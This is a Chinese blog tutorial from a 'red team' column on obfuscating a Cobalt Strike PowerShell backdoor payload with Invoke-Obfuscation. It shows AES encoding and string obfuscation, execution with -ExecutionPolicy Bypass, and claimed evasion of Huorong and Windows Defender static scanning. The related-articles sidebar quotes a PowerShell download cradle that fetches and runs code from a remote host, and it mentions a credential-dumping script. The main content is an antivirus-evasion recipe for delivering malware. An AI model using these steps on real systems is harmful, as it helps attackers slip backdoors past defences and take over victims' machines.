PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)

最新推荐文章于 2024-05-14 08:54:41 发布
最新推荐文章于 2024-05-14 08:54:41 发布
阅读量2.1k 收藏 21
点赞数 4
分类专栏: 红队的自我修养 文章标签: 网络 网络安全 安全 web安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xf555er/article/details/128589654
版权

Invoke-Obfuscation

简介

Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-Obfuscation
Invoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。Invoke-Obfuscation还有多个选项可以选择,如TOKEN、AST、STRING、ENCODING、COMPRESS和LAUNCHER,可以帮助你更好地混淆脚本


简单演示

1.CS生成ps木马

打开Cobalt Strike, 点击攻击>生成后门->Payload Generator

image-20230106191819966


选择相应的监听, 生成powershell木马

image-20230106191957575


2.导入模块并加载

进入invoke-Obsfuscation文件夹并打开powershell, 执行如下命令导入Invoke-Obfuscation模块

Import-Module .\Invoke-Obfuscation.psd1

执行如下命令加载模块

Invoke-Obfuscation

image-20230106192850710


随后进入工具命令行界面, 如下图所示, 该工具支持六种加密方式:

  • TOKEN: 将脚本转换为一个或多个PowerShell解析器令牌的序列

  • AST: 将脚本转换为抽象语法树

  • STRING: 混淆脚本中的字符串,使得脚本的意图变得模糊不清

  • ENCONDING: 将脚本转换为ASCII、Unicode或Base64编码

  • COMPRESS: 将脚本压缩,使得脚本的大小变小,从而使得脚本的传输和存储更加方便

  • LAUNCHER: 生成一个启动器,该启动器可以在目标系统上执行混淆后的脚本

1


3.输入要加密的脚本路径

set scriptpath C:\Users\hacker\Desktop\payload.ps1

image-20230106220244166


4.加密脚本

此次我选择编码加密, 输入encoding, 随后出现8种编码加密方式, 这里我简单介绍下常用的五种加密

  1. ASCII编码
  2. HEX(16进制)编码
  3. octal(8进制)编码
  4. Binary(2进制)编码
  5. AES算法加密(最常用)

image-20230106220433823


此处我选择5, 即AES算法加密

1


输入back返回上级目录, 然后输入string对脚本文件进行字符串混肴, 有三种字符串混肴方法, 此处我输入2选择了第二种

image-20230106222848097


5.查看加密选项

可以看到加密前和加密后的脚本内容对比, 以及采用了何种加密方法和完整的加密命令

show options

image-20230106223901101


6.输出脚本

输出加密后的脚本文件至工具所在目录

out test.ps1

image-20230106221539461


杀软测试

火绒

使用火绒静态扫描脚本文件, 没有发现威胁

image-20230106223945754


cmd命令行输入如下命令执行脚本, 火绒没有报毒, 成功过掉火绒动态扫描

PowerShell.exe -ExecutionPolicy Bypass -File .\test.ps1

至于为何要加上-ExecutionPolicy Bypass参数, 这是因为在默认情况下, powershell的安全策略规定不允许运行命令和文件, 但是可以通过添加此参数来绕过任意一个安全保护规则, 在真实的渗透环境中经常用到此参数来执行powershell脚本

image-20230106224136701


WindowDefender

成功过掉WindowDefender的静态扫描

image-20230106224957853


但是过不了WindowDefender的动态扫描

image-20230106225055133

Henry404s
关注
  • 4
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件定义了每个原子测试的攻击过程以及更易于读取的相同数据的markdown( md )版本。 执行原子测试可能会使您的系统处于不良状态。 您有责任在执行测试之前了解测试的内容。 在开始之前,请确保您具有测试权限。 建议设置用于原子测试执行的测试计算机,该计算机与您的环境中的构建类似。 确保已安装好收集/ EDR解决方案,并且端点正在签入并处于活动状态。 有关完整的请参见Wiki。 注意:此执行框架可在Windows,MacOS和Linux上运行。 如果在MacOS或Linux上使用,则必须先安装PowerShell C
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator(3)
2401_84969310的博客
05-13 70
【代码】【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator(3)
如何进行免杀
hakksjss的博客
05-14 705
0x03 免杀思路总结环境准备:火绒(静态)、360、windowsdef(动态) 免杀的最基本思路就是去除其特征,这个特征有可能是特征码,也有可能是行为特征,只要在不修改其 原有功能的情况下,破坏了病毒与木马所固有的特征,一次免杀就能完成。文件免杀
渗透测试-window反弹shell
lza20001103的博客
05-11 4249
window反弹shell
Powershell免杀
mingyqf的博客
05-11 2402
Powershell免杀 本文作者:Chenw 本文链接:https://www.cnblogs.com/chen-w/p/14726549.html 0x01 前言 前几天搞一个站的时候,进入内网,想让内网一台机子powershell上线。然后被杀软拦截了,极其的不讲武德,想着找我极强的朋友们白嫖个免杀的方法。 后面还是没有白嫖到,只好自己去研究学习一下了(针对CS的进行免杀,后面思想大同小异)于是做了这个小笔记。 0x02 Powershell免杀思路 先介绍一下powershell木马最常用的方式
免杀学习(三)powershell
m0_62207170的博客
01-12 603
powershell免杀
Powershell火绒免杀上线
春日野穹
01-10 5188
引言 拿到一台位于阿里云主机的shell,为IIS权限需要上线cs提权,主机自带阿里云盾和Windows Defender、且安装了火绒,为方便后续操作,需要进一步提权。 powershell免杀制作 payload生成 原生payload生成后被无情秒杀 powershell免杀制作 打开powershell命令行,将payload编码 1.新建一个变量h,用来接收之后编码的payload $h= '' 2.把FromBase64String放入变量$k中 $k=[System.Convert]
免杀对抗-PowerShell-混淆+分离
xiaoheizi的博客
09-15 698
解码代码:$xx=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($DoIt))被火绒杀死了,这个火绒真的搞不懂,只经过base64编码的让过了,经过base64编码又混淆的反而被杀。1.将文件模式的powershell使用Windows PowerShell ISE 打开,将文件中变量进行base64编码.3.命令模式powershell执行——直接将cs生成的txt文件中的命令复制到命令行执行。
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软Invoke-Obfuscation-Bypass + PS2EXE 绕过主流
PowerShell中使用curl(Invoke-WebRequest)的方法教程
01-10
PowerShell能干什么呢?PowerShell首先是个Shell,定义好了一堆命令与操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序;第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件级的...
Invoke-WCMDump结合powershell进行密码获取
03-26
从Credential Manager导出Windows凭据的Powershell脚本 https://github.com/peewpw/Invoke-WCMDump PS>Import-Module .\Invoke-WCMDump.ps1 PS>Invoke-WCMDump powershell.exe "IEX (New-Object Net.WebClient)....
PowerShellTranslate:PowerShell Invoke-Translate 和 New-TranslationTable 通常用于替换密码
06-21
PowerShell 中使用它下面的例子展示了 Invoke-Translate 的用法。 在这里,字符串中的每个元音都被其元音位置替换。 $InputTable = " aeiou " $OutputTable = " 12345 " $TranslationTable = New-Translation...
Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And
10-25
标题“Bohannon-Revoke-Obfuscation-PowerShell-Obfuscation-Detection-And”与描述中的“Evasion-Using-Science-wp”共同指向一个主题,即PowerShell混淆技术的检测与规避方法,特别是利用科学手段进行的反混淆策略...
Invoke-Parallel:通过简化的多线程加速PowerShell
02-21
并行调用 该函数将接受一个脚本或脚本块,并...# Use Invoke-Parallel with variables in your session $Number = 2 1 .. 10 | Invoke-Parallel - ImportVariables - ScriptBlock { $Number * $_ } # Use the $Usin
最新版: PowerShell-7.4.3-win-x64.msi
最新发布
06-20
PowerShell-7.4.3-win-x64.msi 安装 PowerShell 是微软开发的一种命令行 shell 和脚本语言,它设计用于系统管理任务和自动化。相比传统的命令提示符(CMD),PowerShell 提供了更强大、灵活的功能集,特别是对于...
Get-MediaInfo:Get-MediaInfo是完整的PowerShell MediaInfo解决方案
02-06
Get-MediaInfo是完整的PowerShell MediaInfo解决方案。 它包含三个PowerShell高级功能: Get-MediaInfo Get-MediaInfoValue Get-MediaInfoSummary 安装 通过PowerShellGet进行安装或下载: 获取媒体信息 将媒体...
简单免杀火绒、360极速版
摔不死的笨鸟的博客
03-03 1792
免杀
【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell
AA8j的博客
07-06 1885
0x01 项目地址 https://github.com/danielbohannon/Invoke-Obfuscation 0x02 用法 生成powershellpowershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:55556/a'))" 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscati
免杀火绒
sash1mi
02-04 2305
免杀火绒 接上篇文章《免杀过360全家桶》 https://blog.csdn.net/weixin_46676743/article/details/113350500 1.cs建立监听 2.生成payload 3.将生成的payload放到kali里编译 4.FourEye编译 项目地址与具体使用方法: https://github.com/lengjibo/FourEye 注意:一定要按照此工具的编译规则install gcc!! 5.火绒查杀 360查杀 6.cs上线 .
如何下载Invoke-Obfuscation
04-06
1. 打开GitHub页面:https://github.com/danielbohannon/Invoke-Obfuscation 2. 点击“Clone or download”按钮,选择“Download ZIP”选项,将压缩包下载到本地。 3. 解压缩下载的压缩包。 4. 在解压缩后的文件夹中找到“Invoke-Obfuscation.psd1”文件,右键点击该文件,选择“以管理员身份运行PowerShell”。 5. 在PowerShell窗口中输入“Import-Module .\Invoke-Obfuscation.psd1”,按回车键进行加载。 6. 下载完成,可以开始使用Invoke-Obfuscation

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值